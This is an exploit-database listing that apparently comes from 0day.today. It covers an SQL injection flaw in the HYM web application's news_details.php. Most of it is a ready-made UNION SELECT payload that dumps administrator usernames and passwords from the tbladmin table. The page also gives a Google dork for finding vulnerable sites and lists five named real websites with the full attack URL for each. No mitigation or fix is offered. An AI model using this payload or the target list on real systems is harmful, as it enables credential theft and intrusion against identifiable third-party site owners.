[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

HYM (news_details.php) SQL Injection Vulnerability

Author
GlaDiaT0R
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-13229
Category
web applications
Date add
07-07-2010
Platform
php
==================================================
HYM (news_details.php) SQL Injection Vulnerability
==================================================


##############################################################################
# [+]Title: [HYM (news_details.php) SQL Injection Vulnerability]
##############################################################################
# [+] About :
==============================================================================
# Author :  GlaDiaT0R  
# Contact: the_gl4di4t0r[AT]hotmail[DOT]com or berrahal.ryadh[AT]gmail[DOT]com
# Team :  Tunisian Power Team
# Greetz : ALLAH ! , Boomrang_victim, Marwen_Neo, Alphanix, Zigma & my friends
#
# Software Link: http://www.hym.com.au
# Google dork : [ Powered by HYM ]
##############################################################################
# [+] Exploits :
==============================================================================
#
#       Path: http://localhost/news_details.php?news_id=[SQL]
#             
#       Demo : -1994+union+all+select+1,2,3,group_concat(username,0x3a,passwd),5,6+from+tbladmin--
#    http://www.peachbooksales.com.au/news_details.php?news_id=-1994+union+all+select+1,2,3,group_concat(username,0x3a,passwd),5,6+from+tbladmin--     
#    http://www.jonesbuilder.com.au/news_details.php?news_id=-1994+union+all+select+1,2,3,group_concat(username,0x3a,passwd),5,6+from+tbladmin--
#    http://www.historicalvillage.com.au/news_details.php?news_id=-1994+union+all+select+1,2,3,group_concat(username,0x3a,passwd),5,6+from+tbladmin--
#    http://www.ultimategoddess.com.au/news_details.php?news_id=-1994+union+all+select+1,2,3,group_concat(username,0x3a,passwd),5,6+from+tbladmin--
#    http://www.linklearn.com.au/news_details.php?news_id=-1994+union+all+select+1,2,3,group_concat(username,0x3a,passwd),5,6+from+tbladmin--
##############################################################################
# Notice: I'M MUSLIM
############################################################################## 



#  0day.today [2024-10-06]  #